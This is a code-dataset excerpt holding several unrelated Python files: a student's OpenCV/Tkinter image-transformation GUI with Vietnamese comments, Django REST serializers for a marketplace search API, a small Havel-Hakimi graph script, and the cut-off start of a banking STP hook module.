self.onApply)\n\t\tapplic.grid(row = 5, column = 0)\n\t\tapplic.place(x = 170, y = 200)\n\t\texit11 = Button(self, text = \"Exit\", command = self.onQuit)\n\t\texit11.grid(row = 6, column = 0)\n\t\texit11.place(x = 170, y = 270)\n\n\tdef onQuit (self): #hàm thoát/ dừng chương trình\n\t\tself.quit()\n\n\tdef onIntro (self): #hàm giới thiệu chung chung =)) mặc dù hong biết cần hong nữa\n\t\tmbox.showinfo(\"Hello everyone!!!\", \"Đây là bài tập lớn của nhóm mình\")\n\n\tdef nothing (x, event = None): #hàm đúng theo tên là nothing =)) \n\t\tpass\n\n\tdef onResize (self): #hàm Scaling trong tài liệu\n\t\tim = img\n\n\t\tcv2.namedWindow('Image', cv2.WINDOW_AUTOSIZE)\n\t\tcv2.namedWindow('Resize', cv2.WINDOW_AUTOSIZE)\n\n\t\tcv2.createTrackbar('x', 'Resize', 10, 20, self.nothing)\t\n\t\tcv2.createTrackbar('y', 'Resize', 10, 20, self.nothing)\n\t\tcv2.createTrackbar('Larange', 'Resize', 0, 2, self.nothing)\n\t\tcv2.createTrackbar('mode', 'Resize', 0, 1, self.nothing) #với 0 là chưa chạy, 1 là phóng to, 2 là thu nhỏ\n\n\t\twhile(1):\n\t\t\tcv2.imshow(\"Image\", im)\n\n\t\t\tk = cv2.waitKey(1) & 0xFF\n\t\t\tif k == 27: \n\t\t\t\tbreak\n\n\t\t\tOx = cv2.getTrackbarPos ('x', 'Resize')\n\t\t\tOy = cv2.getTrackbarPos ('y', 'Resize')\n\t\t\tb = cv2.getTrackbarPos ('Larange', 'Resize')\n\t\t\tif b == 0:\n\t\t\t\tb = cv2.INTER_AREA\n\t\t\tif b == 1:\n\t\t\t\tb = cv2.INTER_CUBIC\n\t\t\tif b == 2:\n\t\t\t\tb = cv2.INTER_LINEAR\n\n\t\t\tM1 = cv2.getTrackbarPos ('mode', 'Resize')\n\n\t\t\tOx = Ox/10\n\t\t\tOy = Oy/10\n\n\t\t\tif Ox == 0: \n\t\t\t\tOx = 1/10\n\n\t\t\tif Oy == 0:\n\t\t\t\tOy = 1/10\n\n\t\t\tif M1 == 0:\n\t\t\t\tself.nothing\n\t\t\tif M1 == 1:\n\t\t\t\tim = cv2.resize(img, None, fx = Ox, fy = Oy, interpolation = b)\n\t\tcv2.destroyAllWindows()\n\n\tdef onTranslation (self): #hàm translation\n\t\tim = img\n\n\t\tcv2.namedWindow('Image', cv2.WINDOW_NORMAL)\n\t\tcv2.namedWindow('Translation', cv2.WINDOW_AUTOSIZE)\n\n\t\tcv2.createTrackbar('Zn', 'Translation', 10, 20, self.nothing)\n\t\tcv2.createTrackbar('Oz1', 'Translation', 20, 40, self.nothing)\n\t\tcv2.createTrackbar('Oy', 'Translation', cols, cols*2, self.nothing)#Chỉnh thông số theo số pixel ảnh\n\t\tcv2.createTrackbar('Oz2', 'Translation', 20, 40, self.nothing)\n\t\tcv2.createTrackbar('Zd', 'Translation', 10, 20, self.nothing)\n\t\tcv2.createTrackbar('Ox', 'Translation', rows, rows*2, self.nothing)#Chỉnh thông số theo số pixel ảnh\n\t\t\n\t\tcv2.createTrackbar('switch', 'Translation', 0, 1, self.nothing)\n\n\t\twhile(1):\n\t\t\tcv2.imshow(\"Image\", im)\n\n\t\t\tk = cv2.waitKey(1) & 0xFF\n\t\t\tif k == 27: \n\t\t\t\tbreak\n\n\t\t\ta1 = cv2.getTrackbarPos ('Zn', 'Translation')\n\t\t\tb1 = cv2.getTrackbarPos ('Oz1', 'Translation')\n\t\t\ty = cv2.getTrackbarPos ('Oy', 'Translation')\n\t\t\tb2 = cv2.getTrackbarPos ('Oz2', 'Translation')\n\t\t\ta2 = cv2.getTrackbarPos ('Zd', 'Translation')\n\t\t\tx = cv2.getTrackbarPos ('Ox', 'Translation')\n\n\t\t\ts = cv2.getTrackbarPos ('switch','Translation')\n\n\t\t\t#hệ số zoom (ngang, dọc)\n\t\t\ta1 = a1/10\n\t\t\tif a1 == 0:\ta1 = 1/10\n\t\t\ta2 = a2/10\n\t\t\tif a2 == 0:\ta2 = 1/10\n\n\t\t\t#hệ số trục Oz Có thể chỉnh thêm nếu muốn\n\t\t\tb1 = (b1-20)/10 \n\t\t\tb2 = (b2-20)/10\n\n\t\t\t#hệ số trục tọa độ\n\t\t\ty = y - cols\n\t\t\tx = x - rows\n\n\t\t\tM = np.float32([[a1, b1, y], [b2, a2, x]])\n\t\t\tif s == 0:\n\t\t\t\tself.nothing\n\n\t\t\tif s == 1:\n\t\t\t\tim = cv2.warpAffine (img, M, (cols, rows))\n\t\tcv2.destroyAllWindows()\n\n\tdef onRotate (self): #hàm Rotate\n\t\tim = 
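`onTranslation` above rebuilds a 2x3 `np.float32` matrix from trackbar positions on every frame and feeds it to `cv2.warpAffine`. A minimal version of that loop for pure translation, using a synthetic image so it runs without the original `twice.jpg` (window and trackbar names are illustrative):

```python
import cv2
import numpy as np

img = np.full((200, 300, 3), 255, np.uint8)            # stand-in image
cv2.rectangle(img, (50, 50), (120, 120), (0, 0, 255), -1)

def nothing(x):
    pass                                               # required trackbar callback

cv2.namedWindow("Translate")
cv2.createTrackbar("tx", "Translate", 150, 300, nothing)   # offset by half-range
cv2.createTrackbar("ty", "Translate", 100, 200, nothing)

while True:
    tx = cv2.getTrackbarPos("tx", "Translate") - 150   # recentre around 0
    ty = cv2.getTrackbarPos("ty", "Translate") - 100
    M = np.float32([[1, 0, tx], [0, 1, ty]])           # pure translation matrix
    cv2.imshow("Translate", cv2.warpAffine(img, M, (300, 200)))
    if cv2.waitKey(30) & 0xFF == 27:                   # Esc quits
        break
cv2.destroyAllWindows()
```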
img\n\n\t\tcv2.namedWindow('Image', cv2.WINDOW_NORMAL)\n\t\tcv2.namedWindow('Rotate', cv2.WINDOW_AUTOSIZE)\n\n\t\tcv2.createTrackbar('alpha', 'Rotate', 360, 720, self.nothing)\n\t\tcv2.createTrackbar('Width', 'Rotate', int(cols/2), cols, self.nothing)\n\t\tcv2.createTrackbar('Height', 'Rotate', int(rows/2), rows, self.nothing)\n\t\tcv2.createTrackbar('Zoom', 'Rotate', 10, 20, self.nothing)\n\t\tcv2.createTrackbar('switch', 'Rotate', 0, 1, self.nothing)\n\n\t\twhile(1):\n\t\t\tcv2.imshow(\"Image\", im)\n\n\t\t\tk = cv2.waitKey(1) & 0xFF\n\t\t\tif k == 27: \n\t\t\t\tbreak\n\n\t\t\ta = cv2.getTrackbarPos ('alpha', 'Rotate')\n\t\t\tb = cv2.getTrackbarPos ('Zoom', 'Rotate')\n\t\t\tc = cv2.getTrackbarPos ('Width', 'Rotate')\n\t\t\td = cv2.getTrackbarPos ('Height', 'Rotate')\n\t\t\ts = cv2.getTrackbarPos ('switch','Rotate')\n\n\t\t\ta = a - 360\n\t\t\tb = b / 10\n\t\t\tif b == 0:\n\t\t\t\tb = 1/10\n\n\t\t\tM1 = cv2.getRotationMatrix2D ((c, d), a, b) # the last argument is the zoom factor\n\n\t\t\tif s == 0:\n\t\t\t\tself.nothing\n\n\t\t\tif s == 1:\n\t\t\t\tim = cv2.warpAffine (img, M1, (cols, rows))\n\t\tcv2.destroyAllWindows()\n\n\tdef onAffine (self): # Affine transform function\n\t\tim = img\n\n\t\tcv2.namedWindow('Image', cv2.WINDOW_NORMAL)\n\t\tcv2.namedWindow('Affine', cv2.WINDOW_NORMAL)\n\n\t\t# In theory these are the 3 input points\n\t\tcv2.createTrackbar('a1', 'Affine', 50, rows, self.nothing)\n\t\tcv2.createTrackbar('a2', 'Affine', 50, cols, self.nothing)\n\t\tcv2.createTrackbar('b1', 'Affine', 200, rows, self.nothing) \n\t\tcv2.createTrackbar('b2', 'Affine', 50, cols, self.nothing)\n\t\tcv2.createTrackbar('c1', 'Affine', 50, rows, self.nothing)\n\t\tcv2.createTrackbar('c2', 'Affine', 200, cols, self.nothing)\n\n\t\t# 3 output points # note: swap rows and cols with each other later\n\t\tcv2.createTrackbar('d1', 'Affine', rows, 2*rows, self.nothing)\n\t\tcv2.createTrackbar('d2', 'Affine', cols, 2*cols, self.nothing)\n\t\tcv2.createTrackbar('e1', 'Affine', rows, 2*rows, self.nothing)\n\t\tcv2.createTrackbar('e2', 'Affine', cols, 2*cols, self.nothing)\n\t\tcv2.createTrackbar('f1', 'Affine', rows, 2*rows, self.nothing)\n\t\tcv2.createTrackbar('f2', 'Affine', cols, 2*cols, self.nothing)\n\n\t\tswitch = \"0: OFF\" + \"\\n1:Affine\"\n\t\tcv2.createTrackbar(switch, 'Affine', 0, 1, self.nothing)\n\n\t\twhile(1):\n\t\t\tcv2.imshow(\"Image\", im)\n\n\t\t\tk = cv2.waitKey(1) & 0xFF\n\t\t\tif k == 27: \n\t\t\t\t\tbreak\n\n\t\t\ta1 = cv2.getTrackbarPos ('a1', 'Affine')\n\t\t\ta2 = cv2.getTrackbarPos ('a2', 'Affine')\n\t\t\tb1 = cv2.getTrackbarPos ('b1', 'Affine')\n\t\t\tb2 = cv2.getTrackbarPos ('b2', 'Affine')\n\t\t\tc1 = cv2.getTrackbarPos ('c1', 'Affine')\n\t\t\tc2 = cv2.getTrackbarPos ('c2', 'Affine')\n\n\t\t\td1 = cv2.getTrackbarPos ('d1', 'Affine')\n\t\t\td1 = d1 - rows\n\t\t\td2 = cv2.getTrackbarPos ('d2', 'Affine')\n\t\t\td2 = d2 - cols\n\t\t\te1 = cv2.getTrackbarPos ('e1', 'Affine')\n\t\t\te1 = e1 - rows\n\t\t\te2 = cv2.getTrackbarPos ('e2', 'Affine')\n\t\t\te2 = e2 - cols\n\t\t\tf1 = cv2.getTrackbarPos ('f1', 'Affine')\n\t\t\tf1 = f1 - rows\n\t\t\tf2 = cv2.getTrackbarPos ('f2', 'Affine')\n\t\t\tf2 = f2 - cols\n\n\t\t\ts = cv2.getTrackbarPos (switch, 'Affine')\n\n\t\t\t# Point data for the Affine transform\n\t\t\tpts1 = np.float32([[a1, a2], [b1, b2], [c1, c2]])\n\t\t\tpts2 = np.float32([[d1, d2], [e1, e2], [f1, f2]])\n\t\t\tM = cv2.getAffineTransform (pts1, pts2)\n\n\t\t\tif s == 0:\n\t\t\t\tself.nothing\n\t\t\tif s == 1:\n\t\t\t\tim = cv2.warpAffine (img, M, (rows, cols))\n\n\t\tcv2.destroyAllWindows()\n\n\tdef onPerspect (self):\n\t\tim = 
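`onRotate` above (with the trackbar-name case mismatch corrected: the bars are created as 'Width'/'Height' but were read back as 'width'/'height', and `b2` in `onAffine` read 'b1' twice) centres on `cv2.getRotationMatrix2D`. The core transform without the GUI loop, on a synthetic image so it runs headless:

```python
import cv2
import numpy as np

img = np.zeros((200, 300, 3), np.uint8)
cv2.putText(img, "demo", (90, 110), cv2.FONT_HERSHEY_SIMPLEX,
            1.5, (255, 255, 255), 2)

rows, cols = img.shape[:2]
# Rotate 30 degrees counter-clockwise about the image centre, no scaling.
M = cv2.getRotationMatrix2D((cols / 2, rows / 2), 30, 1.0)
rotated = cv2.warpAffine(img, M, (cols, rows))   # dsize is (width, height)

cv2.imwrite("rotated.jpg", rotated)   # write instead of imshow: no window needed
```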
img\n\n\t\tcv2.namedWindow('Image', cv2.WINDOW_NORMAL)\n\t\tcv2.namedWindow('Perspect', cv2.WINDOW_NORMAL)\n\n\t\tcv2.createTrackbar('a1', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('a2', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('b1', 'Perspect', 0, 255, self.nothing) \n\t\tcv2.createTrackbar('b2', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('c1', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('c2', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('d1', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('d2', 'Perspect', 0, 255, self.nothing)\n\n\t\tcv2.createTrackbar('e1', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('e2', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('f1', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('f2', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('g1', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('g2', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('h1', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('h2', 'Perspect', 0, 255, self.nothing)\n\n\t\tcv2.createTrackbar('row', 'Perspect', 0, 255, self.nothing)\n\t\tcv2.createTrackbar('col', 'Perspect', 0, 255, self.nothing) \n\n\t\tswitch = \"0: OFF\" + \"\\n1: Perspective\"\n\t\tcv2.createTrackbar(switch, 'Perspect', 0, 1, self.nothing)\n\n\t\twhile(1):\n\t\t\tcv2.imshow(\"Image\", im)\n\n\t\t\tk = cv2.waitKey(1) & 0xFF\n\t\t\tif k == 27: \n\t\t\t\t\tbreak\n\n\t\t\ta1 = cv2.getTrackbarPos ('a1', 'Perspect')\n\t\t\ta2 = cv2.getTrackbarPos ('a2', 'Perspect')\n\t\t\tb1 = cv2.getTrackbarPos ('b1', 'Perspect')\n\t\t\tb2 = cv2.getTrackbarPos ('b2', 'Perspect')\n\t\t\tc1 = cv2.getTrackbarPos ('c1', 'Perspect')\n\t\t\tc2 = cv2.getTrackbarPos ('c2', 'Perspect')\n\t\t\td1 = cv2.getTrackbarPos ('d1', 'Perspect')\n\t\t\td2 = cv2.getTrackbarPos ('d2', 'Perspect')\n\n\t\t\te1 = cv2.getTrackbarPos ('e1', 'Perspect')\n\t\t\te2 = cv2.getTrackbarPos ('e2', 'Perspect')\n\t\t\tf1 = cv2.getTrackbarPos ('f1', 'Perspect')\n\t\t\tf2 = cv2.getTrackbarPos ('f2', 'Perspect')\n\t\t\tg1 = cv2.getTrackbarPos ('g1', 'Perspect')\n\t\t\tg2 = cv2.getTrackbarPos ('g2', 'Perspect')\n\t\t\th1 = cv2.getTrackbarPos ('h1', 'Perspect')\n\t\t\th2 = cv2.getTrackbarPos ('h2', 'Perspect')\n\n\t\t\ti1 = cv2.getTrackbarPos ('row', 'Perspect')\n\t\t\ti2 = cv2.getTrackbarPos ('col', 'Perspect')\n\n\t\t\ts = cv2.getTrackbarPos (switch, 'Perspect')\n\n\t\t\t# Point data for the Perspective transform\n\t\t\tpts3 = np.float32([[a1, a2], [b1, b2], [c1, c2], [d1, d2]])\n\t\t\tpts4 = np.float32([[e1, e2], [f1, f2], [g1, g2], [h1, h2]])\n\t\t\tM = cv2.getPerspectiveTransform (pts3, pts4)\n\n\t\t\tif s == 0:\n\t\t\t\tself.nothing\n\t\t\tif s == 1:\n\t\t\t\tim = cv2.warpPerspective (img, M, (i1, i2))\n\n\t\tcv2.destroyAllWindows()\n\n\tdef onApply (self):\n\t\tcv2.namedWindow('Real', cv2.WINDOW_NORMAL)\n\t\tcv2.namedWindow('Face', cv2.WINDOW_NORMAL)\n\n\t\tface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\t\tfaces = face_cascade.detectMultiScale(img, scaleFactor = 1.337, minNeighbors = 6, minSize = (30, 30))\n\t\tnumber = len(faces)\n\n\t\tim = np.zeros((300, 300, 3), np.uint8)\n\n\t\tcv2.createTrackbar('Faces', 'Face', 0, number - 1, self.nothing) \n\t\tcv2.createTrackbar('Switch', 'Face', 0, 1, self.nothing) \n\n\t\twhile(1):\n\n\t\t\ti = cv2.getTrackbarPos ('Faces', 'Face')\n\t\t\ts = cv2.getTrackbarPos ('Switch', 'Face')\n\n\t\t\tif s == 0:\n\t\t\t\tself.nothing\n\t\t\tif s == 1:\n\t\t\t\tx, y, w, h = 
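Both `onPerspect` (with `b2` corrected above: it read trackbar 'b1' twice) and `onApply` reduce to the same primitive: map four source points onto an upright rectangle with `cv2.getPerspectiveTransform`, which requires exactly four point pairs, unlike the three of the affine case. A headless sketch on a synthetic image:

```python
import cv2
import numpy as np

img = np.zeros((400, 400, 3), np.uint8)
cv2.rectangle(img, (100, 100), (300, 300), (0, 255, 0), -1)

# Map an arbitrary quadrilateral onto an upright w x h rectangle.
w, h = 200, 200
src = np.float32([[100, 100], [300, 100], [100, 300], [300, 300]])
dst = np.float32([[0, 0], [w, 0], [0, h], [w, h]])   # same corner order as src

M = cv2.getPerspectiveTransform(src, dst)   # needs exactly 4 point pairs
crop = cv2.warpPerspective(img, M, (w, h))
print(crop.shape)                           # (200, 200, 3)
```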
faces[i] \n\n\t\t\t\tpts3 = np.float32([[x, y], [x + w, y], [x, y + h], [x + w, y + h]])\n\t\t\t\tpts4 = np.float32([[0, 0], [w, 0], [0, h], [w, h]])\n\t\t\t\tM = cv2.getPerspectiveTransform (pts3, pts4)\n\n\t\t\t\tim = cv2.warpPerspective (img, M, (w, h))\n\t\t\t\n\t\t\tcv2.imshow(\"Face\", im)\n\t\t\tcv2.imshow('Real', img)\n\n\n\t\t\tk = cv2.waitKey(1) & 0xFF\n\t\t\tif k == 27: \n\t\t\t\tbreak\n\t\t\t\n\t\tcv2.destroyAllWindows()\n\nroot = Tk()\nroot.geometry(\"400x408+750+100\")\n# root.configure(background = 'blue') #chỉnh sửa màu nền\napp = BTL(root)\nroot.mainloop()","sub_path":"BTL.py","file_name":"BTL.py","file_ext":"py","file_size_in_byte":12199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"570101406","text":"from datetime import datetime\n\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\n\nfrom rest_framework import serializers\n\nimport amo\nimport mkt\nfrom amo.helpers import absolutify\nfrom constants.applications import DEVICE_TYPES\nfrom mkt.api.fields import ESTranslationSerializerField\nfrom mkt.submit.serializers import SimplePreviewSerializer\nfrom mkt.versions.models import Version\nfrom mkt.webapps.models import Category, Geodata, Preview, Webapp\nfrom mkt.webapps.serializers import AppSerializer, SimpleAppSerializer\nfrom mkt.webapps.utils import (dehydrate_content_rating, dehydrate_descriptors,\n dehydrate_interactives)\n\n\nclass ESAppSerializer(AppSerializer):\n # Fields specific to search.\n absolute_url = serializers.SerializerMethodField('get_absolute_url')\n reviewed = serializers.DateField()\n\n # Override previews, because we don't need the full PreviewSerializer.\n previews = SimplePreviewSerializer(many=True, source='all_previews')\n\n # Override those, because we want a different source. 
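`onApply` above crops each detected face via a perspective warp. A minimal face-detection sketch; it assumes the cascade files bundled with the `opencv-python` wheel (exposed as `cv2.data.haarcascades`), whereas the record loads the XML from the working directory:

```python
import cv2

# cv2.data.haarcascades points at the cascades shipped with opencv-python;
# a plain OpenCV build may need an explicit path instead.
cascade = cv2.CascadeClassifier(
    cv2.data.haarcascades + "haarcascade_frontalface_default.xml")

img = cv2.imread("twice.jpg")               # same input image as the record
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=6,
                                 minSize=(30, 30))

for (x, y, w, h) in faces:                  # one (x, y, w, h) box per face
    cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)
cv2.imwrite("faces.jpg", img)
```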
Also, related fields\n # will call self.queryset early if they are not read_only, so force that.\n categories = serializers.SlugRelatedField(read_only=True,\n many=True, slug_field='slug', source='all_categories')\n manifest_url = serializers.CharField(source='manifest_url')\n package_path = serializers.SerializerMethodField('get_package_path')\n\n # Override translations, because we want a different field.\n banner_message = ESTranslationSerializerField(\n source='geodata.banner_message')\n description = ESTranslationSerializerField()\n homepage = ESTranslationSerializerField()\n name = ESTranslationSerializerField()\n release_notes = ESTranslationSerializerField(\n source='current_version.releasenotes')\n support_email = ESTranslationSerializerField()\n support_url = ESTranslationSerializerField()\n\n class Meta(AppSerializer.Meta):\n fields = AppSerializer.Meta.fields + ['absolute_url', 'reviewed']\n\n def __init__(self, *args, **kwargs):\n super(ESAppSerializer, self).__init__(*args, **kwargs)\n\n # Remove fields that we don't have in ES at the moment.\n self.fields.pop('upsold', None)\n\n # Set all fields as read_only just in case.\n for field_name in self.fields:\n self.fields[field_name].read_only = True\n\n @property\n def data(self):\n \"\"\"\n Returns the serialized data on the serializer.\n \"\"\"\n if self._data is None:\n if self.many:\n self._data = [self.to_native(item) for item in self.object]\n else:\n self._data = self.to_native(self.object)\n return self._data\n\n def field_to_native(self, obj, field_name):\n # DRF's field_to_native calls .all(), which we want to avoid, so we\n # provide a simplified version that doesn't and just iterates on the\n # object list.\n return [self.to_native(item) for item in obj.object_list]\n\n def to_native(self, obj):\n app = self.create_fake_app(obj._source)\n return super(ESAppSerializer, self).to_native(app)\n\n def create_fake_app(self, data):\n \"\"\"Create a fake instance of Webapp and related models from ES data.\"\"\"\n is_packaged = data['app_type'] != amo.ADDON_WEBAPP_HOSTED\n is_privileged = data['app_type'] == amo.ADDON_WEBAPP_PRIVILEGED\n\n obj = Webapp(id=data['id'], app_slug=data['app_slug'],\n is_packaged=is_packaged, type=amo.ADDON_WEBAPP,\n icon_type='image/png')\n\n # Set relations and attributes we need on those relations.\n # The properties set on latest_version and current_version differ\n # because we are only setting what the serializer is going to need.\n # In particular, latest_version.is_privileged needs to be set because\n # it's used by obj.app_type_id.\n obj.listed_authors = []\n obj._current_version = Version()\n obj._current_version.addon = obj\n obj._current_version._developer_name = data['author']\n obj._current_version.supported_locales = data['supported_locales']\n obj._current_version.version = data['current_version']\n obj._latest_version = Version()\n obj._latest_version.is_privileged = is_privileged\n obj._geodata = Geodata()\n obj.all_categories = [Category(slug=cat) for cat in data['category']]\n obj.all_previews = [Preview(id=p['id'], modified=p['modified'],\n filetype=p['filetype']) for p in data['previews']]\n obj._device_types = [DEVICE_TYPES[d] for d in data['device']]\n\n # Set base attributes on the \"fake\" app using the data from ES.\n # It doesn't mean they'll get exposed in the serializer output, that\n # depends on what the fields/exclude attributes in Meta.\n for field_name in ('created', 'modified', 'default_locale',\n 'icon_hash', 'is_escalated', 'is_offline',\n 'manifest_url', 
'premium_type', 'regions',\n 'reviewed', 'status', 'weekly_downloads'):\n setattr(obj, field_name, data.get(field_name))\n\n # Attach translations for all translated attributes.\n for field_name in ('name', 'description', 'homepage', 'support_email',\n 'support_url'):\n ESTranslationSerializerField.attach_translations(obj,\n data, field_name)\n ESTranslationSerializerField.attach_translations(obj._geodata,\n data, 'banner_message')\n ESTranslationSerializerField.attach_translations(obj._current_version,\n data, 'release_notes', target_name='releasenotes')\n\n # Set attributes that have a different name in ES.\n obj.public_stats = data['has_public_stats']\n\n # Override obj.get_region() with a static list of regions generated\n # from the region_exclusions stored in ES.\n obj.get_regions = obj.get_regions(obj.get_region_ids(restofworld=True,\n excluded=data['region_exclusions']))\n\n # Some methods below will need the raw data from ES, put it on obj.\n obj.es_data = data\n\n return obj\n\n def get_content_ratings(self, obj):\n body = (mkt.regions.REGION_TO_RATINGS_BODY().get(\n self.context['request'].REGION.slug, 'generic'))\n return {\n 'body': body,\n 'rating': dehydrate_content_rating(\n (obj.es_data.get('content_ratings') or {})\n .get(body)) or None,\n 'descriptors': dehydrate_descriptors(\n obj.es_data.get('content_descriptors', {})\n ).get(body, []),\n 'interactives': dehydrate_interactives(\n obj.es_data.get('interactive_elements', [])),\n }\n\n def get_versions(self, obj):\n return dict((v['version'], v['resource_uri'])\n for v in obj.es_data['versions'])\n\n def get_ratings_aggregates(self, obj):\n return obj.es_data.get('ratings', {})\n\n def get_upsell(self, obj):\n upsell = obj.es_data.get('upsell', False)\n if upsell:\n region_id = self.context['request'].REGION.id\n exclusions = upsell.get('region_exclusions')\n if exclusions is not None and region_id not in exclusions:\n upsell['resource_uri'] = reverse('app-detail',\n kwargs={'pk': upsell['id']})\n else:\n upsell = False\n return upsell\n\n def get_absolute_url(self, obj):\n return absolutify(obj.get_absolute_url())\n\n def get_package_path(self, obj):\n return obj.es_data.get('package_path')\n\n def get_tags(self, obj):\n return obj.es_data['tags']\n\n\nclass SimpleESAppSerializer(ESAppSerializer):\n\n class Meta(SimpleAppSerializer.Meta):\n pass\n\n\nclass SuggestionsESAppSerializer(ESAppSerializer):\n icon = serializers.SerializerMethodField('get_icon')\n\n class Meta(ESAppSerializer.Meta):\n fields = ['name', 'description', 'absolute_url', 'icon']\n\n def get_icon(self, app):\n return app.get_icon_url(64)\n\n\nclass RocketbarESAppSerializer(serializers.Serializer):\n \"\"\"Used by Firefox OS's Rocketbar apps viewer.\"\"\"\n name = ESTranslationSerializerField()\n\n @property\n def data(self):\n if self._data is None:\n self._data = [self.to_native(o['payload']) for o in self.object]\n return self._data\n\n def to_native(self, obj):\n # fake_app is a fake instance because we need to access a couple\n # properties and methods on Webapp. 
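The pattern above, hydrating an unsaved "fake" model from a search-index document so the regular serializer can render it without database hits, can be prototyped with plain attribute assignment; `types.SimpleNamespace` shows the idea without any ORM (all field names and values below are illustrative):

```python
from types import SimpleNamespace

es_doc = {"id": 7, "app_slug": "demo",
          "manifest_url": "https://example.com/m.webapp"}

fake_app = SimpleNamespace()
for field_name in ("id", "app_slug", "manifest_url", "icon_hash"):
    # Copy only the fields the serializer will read; missing ones become None.
    setattr(fake_app, field_name, es_doc.get(field_name))

print(fake_app.app_slug, fake_app.manifest_url, fake_app.icon_hash)
```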
It should never hit the database.\n self.fake_app = Webapp(\n id=obj['id'], icon_type='image/png', type=amo.ADDON_WEBAPP,\n default_locale=obj.get('default_locale', settings.LANGUAGE_CODE),\n icon_hash=obj.get('icon_hash'),\n modified=datetime.strptime(obj['modified'], '%Y-%m-%dT%H:%M:%S'))\n ESTranslationSerializerField.attach_translations(\n self.fake_app, obj, 'name')\n return {\n 'name': self.fields['name'].field_to_native(self.fake_app, 'name'),\n 'icon': self.fake_app.get_icon_url(64),\n 'slug': obj['slug'],\n 'manifest_url': obj['manifest_url'],\n }\n\n\nclass RocketbarESAppSerializerV2(AppSerializer, RocketbarESAppSerializer):\n \"\"\"\n Replaced `icon` key with `icons` for various pixel sizes: 128, 64, 48, 32.\n \"\"\"\n\n def to_native(self, obj):\n data = super(RocketbarESAppSerializerV2, self).to_native(obj)\n del data['icon']\n data['icons'] = self.get_icons(self.fake_app)\n return data\n","sub_path":"mkt/search/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":9697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"426128609","text":"\ndef warm1(list):\n\twhile 0 in list:\n\t\tlist.remove(0)\n\treturn list\ndef warm2(list):\n\tlist.sort(reverse = True)\n\treturn list\ndef warm3(list, N):\n\tif(N >= len(list)):\n\t\treturn True\n\telse:\n\t\treturn False\ndef warm4(list, N):\n\tfor i in range(N):\n\t\tlist[i] -= 1\n\treturn list\n\t\ndef HH(list):\n\twarm1(list)\n\tif(len(list) == 0):\n\t\treturn True\t\t\n\twarm2(list)\n\tN = list.pop(0)\n\tif (warm3(list, N) == True):\n\t\treturn False\n\twarm4(list)\n\treturn HH(list)\nnums = [5, 3, 0, 2, 6, 2, 0, 7, 2, 5]\nprint(HH(nums))\n\t\t\n\t\n","sub_path":"Havel_Hakimi.py","file_name":"Havel_Hakimi.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"282736810","text":"\"\"\"--------------------------------------------------------------------------------------------------------------------------------------\nMODULE\n TermMaturityInstructionSTPHook\n\nDESCRIPTION\n This module contains a hook for STP (straight-through-processing) triggered\n by the setting of a maturity instruction on a term deposit.\n\n-----------------------------------------------------------------------------------------------------------------------------------------\nHISTORY\n=========================================================================================================================================\nDate Change no Developer Requester Description\n-----------------------------------------------------------------------------------------------------------------------------------------\n2019-04-18 FAOPS-425 Cuen Edwards Kgomotso Gumbo Behaviour migrated from trade instruction tool with minor\n improvements.\n-----------------------------------------------------------------------------------------------------------------------------------------\n\"\"\"\n\nimport acm\n\nimport OperationsSTPFunctions\nfrom at_logging import getLogger\nfrom OperationsSTPHook import OperationsSTPHook\n\n\nLOGGER = getLogger(__name__)\n\n\nclass TermMaturityInstructionSTPHook(OperationsSTPHook):\n \"\"\"\n Definition of a hook used to perform STP triggered by the\n setting of a maturity instruction on a term deposit.\n \"\"\"\n\n def Name(self):\n \"\"\"\n Get the name of the Operations STP Hook.\n \"\"\"\n return 'Term Maturity Instruction STP Hook'\n\n def IsTriggeredBy(self, eventObject):\n 
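The short record above implements the Havel-Hakimi test for graphical degree sequences, but `HH` calls `warm4(list)` without the required `N` argument, so it raises `TypeError` on any input that survives the earlier checks; `warm3` also rejects `N == len(list)`, which is in fact graphical. A corrected, self-contained version of the same algorithm:

```python
def havel_hakimi(degrees):
    """Return True iff `degrees` is a graphical degree sequence.

    Fixes the record above, where HH() calls warm4(list) without the
    required N argument, and relaxes warm3's off-by-one rejection of
    N == len(remaining).
    """
    seq = [d for d in degrees if d != 0]   # warm1: drop zeros
    if not seq:
        return True
    seq.sort(reverse=True)                 # warm2: descending order
    n = seq.pop(0)
    if n > len(seq):                       # warm3: not enough vertices left
        return False
    for i in range(n):                     # warm4: connect to the n largest
        seq[i] -= 1
        if seq[i] < 0:                     # defensive; cannot happen here
            return False
    return havel_hakimi(seq)

print(havel_hakimi([5, 3, 0, 2, 6, 2, 0, 7, 2, 5]))   # False
print(havel_hakimi([2, 2, 2]))                        # True (a triangle)
```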
